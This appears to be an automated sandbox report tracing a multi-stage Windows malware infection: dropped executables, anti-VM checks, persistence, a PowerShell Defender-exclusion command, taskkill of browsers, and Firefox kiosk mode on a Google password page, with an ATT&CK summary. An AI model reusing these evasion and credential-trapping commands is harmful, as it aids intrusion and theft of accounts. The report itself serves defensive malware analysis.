C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1788
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1336
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2672
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1276
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2332
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2920
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2704
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2080
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1700
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2564
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:2904
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:832
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1720
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:296
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1732
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:2452
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3028
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2064
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:884
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1576
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2788
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:1264
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:940
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1584
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:1988
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2360
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2564
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:1288
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:692
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:2636
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:3060
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3056
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:3428
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:3860
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3868
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:3916
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵PID:3944
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3956
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:4004
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:4052
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:4060
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1852
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:3264
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3280
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:3320
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵PID:3348
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3360
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:3424
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:3060
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3392
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:3416
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:3828
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3900
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:3952
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:3932
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3980
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:4004
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:4072
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:4052
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:3048
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:3312
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3284
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:3356
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵PID:3200
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3332
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:3616
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:3868
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3888
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:3952
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:3964
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:4000
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:4076
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵PID:2916
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:4084
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:4052
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:2880
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3372
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:3712
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵PID:3736
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3744
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:3168
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:3364
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3356
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:940
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd"3⤵
- System Location Discovery: System Language Discovery
PID:2032
-
-
C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 12044⤵
- Loads dropped DLL
- Program crash
PID:2092
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"4⤵
- Executes dropped EXE
PID:2576
-
-
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 10165⤵
- Loads dropped DLL
- Program crash
PID:1460
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 5084⤵
- Loads dropped DLL
- Program crash
PID:2868
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\8QpbZ8u9\Anubis.exe""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2052 -
C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 5004⤵
- Loads dropped DLL
- Program crash
PID:1716
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe"C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\chromium.exeC:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3056
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe"C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1640
-
-
C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe"C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2012
-
-
C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe"C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\dll32.exe"C:\Users\Admin\AppData\Local\Temp\dll32.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat5⤵PID:3296
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:3392
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵PID:3440
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3448
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:3668
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵
- Enumerates processes with tasklist
PID:3820
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3828
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:3904
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵
- Enumerates processes with tasklist
PID:3924
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3932
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:3992
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵PID:4020
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:4028
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:4088
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵
- Enumerates processes with tasklist
PID:3248
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3252
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2180
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵
- Enumerates processes with tasklist
PID:580
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2688
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:1320
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵PID:3556
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3564
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2248
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵
- Enumerates processes with tasklist
PID:3884
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3864
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:3972
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵
- Enumerates processes with tasklist
PID:3976
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3944
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:4040
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵PID:4060
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2828
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:3276
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵
- Enumerates processes with tasklist
PID:2784
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3264
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:3364
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵
- Enumerates processes with tasklist
PID:3404
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3604
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1688
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵PID:3884
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3608
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2732
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵
- Enumerates processes with tasklist
PID:3980
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:4048
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:4028
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵
- Enumerates processes with tasklist
PID:4024
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2548
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:3164
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2880"6⤵
- Enumerates processes with tasklist
PID:3256
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3380
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2308 -
C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2844
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe"C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe"3⤵
- Executes dropped EXE
PID:1600
-
-
C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe"C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2736 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 12004⤵
- Loads dropped DLL
- Program crash
PID:2764
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe"C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1972
-
-
C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe"C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2004 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2776
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:2956
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:300 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.0.1337352138\1171607553" -parentBuildID 20221007134813 -prefsHandle 1244 -prefMapHandle 1196 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd1ffbe0-fde8-41f7-b9f5-a2e143d89b2a} 300 "\\.\pipe\gecko-crash-server-pipe.300" 1324 106dbe58 gpu6⤵PID:1660
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.1.971295469\132527329" -parentBuildID 20221007134813 -prefsHandle 1540 -prefMapHandle 1536 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c80145c5-498f-4946-8dad-2f2b8108cd90} 300 "\\.\pipe\gecko-crash-server-pipe.300" 1552 f3eb258 socket6⤵PID:2472
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.2.1791177149\199354410" -childID 1 -isForBrowser -prefsHandle 2208 -prefMapHandle 2204 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a58b41a8-2a8b-4824-ab7a-c6cedf00c3b9} 300 "\\.\pipe\gecko-crash-server-pipe.300" 2220 175d9258 tab6⤵PID:2320
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.3.1120652361\535779563" -childID 2 -isForBrowser -prefsHandle 2704 -prefMapHandle 2640 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5a22e55-3f41-49f6-9837-3c5a9ea8369b} 300 "\\.\pipe\gecko-crash-server-pipe.300" 2776 1d70a658 tab6⤵PID:2892
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.4.1509203630\1168830996" -childID 3 -isForBrowser -prefsHandle 3660 -prefMapHandle 3768 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {761025cf-1ac0-4ad9-91e7-7c0357446cb6} 300 "\\.\pipe\gecko-crash-server-pipe.300" 3796 e69758 tab6⤵PID:1640
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.5.1702620004\829867254" -childID 4 -isForBrowser -prefsHandle 3904 -prefMapHandle 3908 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5a7969e-1401-43b1-b1cd-37389839b617} 300 "\\.\pipe\gecko-crash-server-pipe.300" 3892 1b84d658 tab6⤵PID:692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.6.705501292\1687976917" -childID 5 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90f30b2a-17ac-4871-b956-62a0716fd10e} 300 "\\.\pipe\gecko-crash-server-pipe.300" 4052 1b84dc58 tab6⤵PID:2912
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe"C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3640
-
-
C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe"C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3632 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 12124⤵
- Loads dropped DLL
- Program crash
PID:3416
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3240
-
-
C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe"C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe"3⤵
- Executes dropped EXE
PID:2800
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
7Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
